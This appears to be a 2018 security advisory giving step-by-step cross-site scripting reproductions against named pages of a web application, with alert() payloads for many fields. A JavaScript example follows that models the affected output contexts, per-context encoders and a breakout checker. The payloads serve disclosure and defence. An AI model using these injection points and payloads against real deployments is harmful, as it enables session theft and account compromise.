James Otten 8/30/2018
All items tested in versions 11.1.468 and 12.0.3074.
- As a low-privileged, read-only user, navigate to /iwc/reports.iwc?repo_id=1&db_id=&filterDbId=<svg/onload=alert(/error_log/)>&type=&pm=P
- As a privileged user, go to /iwc/logViewer.iwc and view the contents of the iwc or error log.
- XSS experienced.
- As a privileged user, navigate to /iwc/userAdministration.iwc?action=3&addType=0&pm=P and try to add a user with the name <img src=x onerror=alert(/add_user/)>
- As a privileged user, go to /iwc/logViewer.iwc and view the contents of the iwc or error log.
- XSS experienced.
There are several other ways to get XSS on /iwc/logViewer.iwc
- As a privileged user, go to /iwc/centralManage.cen
- Add a server.
- For "Notes" use <img src=x onerror=alert(/notes/)>
- After saving, click notes for the server you added.
- XSS experienced.
- As a privileged user, go to /iwc/centralManage.cen
- Add a server.
- For "Display Name" use "onmouseover=alert(/1/)//
- For "Server Name" use "onmouseover=alert(/2/)//
- For "Notes" use "AAAA".
- After saving, mouse over the notes for the server you added.
- XSS experienced.
- Edit the server you added.
- Mouse over the "Display Name" textbox.
- XSS experienced.
- Mouse over the "Server Name" textbox.
- XSS experienced.
- As a privileged user, go to /iwc/userAdministration.iwc?action=1&pm=P
- Add a user.
- For "Name" use <input/autofocus/onfocus=alert(1)>
- After saving, delete the user.
- XSS experienced.
- As a privileged user, go to /iwc/customMetrics.iwc?pm=P
- Add a custom metric.
- For "Display Name" use <img src=x onerror=alert(/custom_resource_metric_display_name/)>
- After saving, view the "Resources" tab in the context of a database instance.
- XSS experienced.
- As a privileged user, go to /iwc/customMetrics.iwc?pm=P
- Add a custom metric.
- For "Description" use <img src=x onerror=alert(/custom_resource_metric_description/)>
- After saving, view the "Resources" tab in the context of a database instance.
- Click "Add Resource Chart" and select your resource.
- Click the gear to view the settings for your resource and you are taken to /iwc/healthMetricsConfigure.iwc
- XSS experienced.
- As a privileged user, navigate to /iwc/adminManage.iwc?pm=P and add or modify an existing "Instance Group".
- Set the "Name" to your XSS payload <img src=x onerror=alert(/instance_group/)>
- Save (XSS experienced with popup message).
- View one of the instances that is part of your new "Instance Group", for example /iwc/database.iwc?dbGroup_id=1&repo_id=1
- XSS experienced.
- As a privileged user, navigate to /iwc/alertMain.iwc?tab=1&pm=P and go to the "Alert Groups" tab.
- Click "Create Alert Group".
- For "Group Name" use <img src=x onerror=alert(/alert_group_name/)>
- Add an alert, a database instance, and save.
- XSS experienced in popup message.
- If your "Name" is long enough and you mouse over the "Name" column for the row you added, you will get XSS via the tooltip (showToolTip in the common js library).
- Click on the "Alert Status" tab or the "Manage Alerts" tab.
- View an alert that would be in the alert group you created.
- XSS experienced on /iwc/alertManagement.iwc
- Go back to the "Alert Groups" tab and delete the item you added.
- XSS experienced.
- As a privileged user, navigate to /iwc/eventAnnotations.iwc?pm=P and select a database instance.
- Click "Add Annotation".
- For "Annotation" use <img src=x onerror=alert(/annotation_name/)>
- For "Occurred At" use the current time.
- For "Details" use <img src=x onerror=alert(/annotation_desc/)>
- For "Created By" use <img src=x onerror=alert(/annotation_created_by/)>
- Save.
- XSS experienced on the "Annotations" page, for example /iwc/eventAnnotations.iwc?pm=P&dbId=1
- View "Trends" for the database instance to which you added the annotation, for example /iwc/database.iwc?repo_id=1&db_id=1&pm=P
- Click on the annotation you created.
- XSS experienced for "Details" and "Created By".
- As a privileged user, go to /iwc/centralManage.cen
- Add a server.
- For "Display Name" use "Mouse over me".
- For "Server Name" use ') | alert()//
- After saving, navigate to /iwc/central.cen
- Mouse over the server you added in the "Unavailable Servers" table.
- XSS experienced.
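The payloads above fall into three output contexts, and each one defeats a different (missing) encoder: the `<img src=x onerror=...>` and `<svg/onload=...>` payloads land in HTML text (cell contents, popup messages, the log viewer), the `"onmouseover=...//` payloads close a double-quoted attribute such as the value="" of the edit textboxes, and `') | alert()//` terminates a JavaScript string literal inside an inline handler like the tooltip call. The following is an added example, not code from the advisory or from the product under test: it models a server-table row with those three contexts (the row template and a `showToolTip` stub name are assumptions), renders it with and without per-context encoding, and statically checks the rendered HTML for each breakout using the advisory's own payloads as constructed input.

```javascript
// Added example (not the product's code). Models the three injection contexts
// the findings exercise and the per-context encoders that neutralise them.
// The row template and the showToolTip() handler name are assumptions.

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
};

// HTML text and quoted-attribute contexts: entity-encode the metacharacters.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'/]/g, (c) => HTML_ESCAPES[c]);
}

// JS string-literal context: hex-escape every non-alphanumeric character so
// quotes, backslashes, newlines and "</" cannot end the literal or the script.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// Assumed row template: display name as text, server name inside a quoted
// value="" attribute, notes both as cell text and as a JS string argument of
// an inline onmouseover handler (the tooltip pattern the advisory describes).
function renderServerRowUnsafe(server) {
  return (
    `<tr><td>${server.displayName}</td>` +
    `<td><input value="${server.serverName}"></td>` +
    `<td onmouseover="showToolTip('${server.notes}')">${server.notes}</td></tr>`
  );
}

function renderServerRowSafe(server) {
  // Inline handler: the browser HTML-decodes the attribute before the JS
  // parser sees it, so encode for JS first and for the attribute second.
  const notesJs = escapeHtml(escapeJsString(server.notes));
  return (
    `<tr><td>${escapeHtml(server.displayName)}</td>` +
    `<td><input value="${escapeHtml(server.serverName)}"></td>` +
    `<td onmouseover="showToolTip('${notesJs}')">${escapeHtml(server.notes)}</td></tr>`
  );
}

// Static breakout check on rendered HTML. Returns the contexts that were
// escaped from ("text", "attribute", "js-string"); empty means all inert.
function findBreakouts(html) {
  const found = [];
  // 1. Only the template's own elements may appear as tags.
  const tags = (html.match(/<\/?([a-z][a-z0-9]*)/gi) || [])
    .map((t) => t.replace(/[</]/g, "").toLowerCase());
  if (tags.some((t) => !["tr", "td", "input"].includes(t))) found.push("text");
  // 2. The character after the closing quote of value="..." must end the
  //    tag or be whitespace; anything else means the quote was closed early.
  const attr = /value="[^"]*"(.)/.exec(html);
  if (attr && !/[\s>]/.test(attr[1])) found.push("attribute");
  // 3. The handler's string literal must be followed directly by the
  //    attribute's closing quote; otherwise the literal was terminated early.
  const js = /showToolTip\('[^']*'\)/.exec(html);
  if (!js || html[js.index + js[0].length] !== '"') found.push("js-string");
  return found;
}

// Constructed inputs using the advisory's payloads, one per context.
const SAMPLE_SERVERS = {
  notesImg: { displayName: "srv", serverName: "srv",
              notes: "<img src=x onerror=alert(/notes/)>" },
  attr:     { displayName: '"onmouseover=alert(/1/)//',
              serverName: '"onmouseover=alert(/2/)//', notes: "AAAA" },
  jsString: { displayName: "Mouse over me", serverName: "srv",
              notes: "') | alert()//" },
};

// Renders every sample both ways and reports the breakouts found in each.
function auditAll() {
  const report = { unsafe: {}, safe: {} };
  for (const [name, server] of Object.entries(SAMPLE_SERVERS)) {
    report.unsafe[name] = findBreakouts(renderServerRowUnsafe(server));
    report.safe[name] = findBreakouts(renderServerRowSafe(server));
  }
  return report;
}

console.log(JSON.stringify(auditAll(), null, 2));
```

The point of the three separate encoders is that `escapeHtml` alone would fix only the first class of finding: a value that is HTML-encoded but then dropped into an inline handler's string literal is still vulnerable to the `')` payload, which is why the encoding must be chosen per output context rather than once at input time.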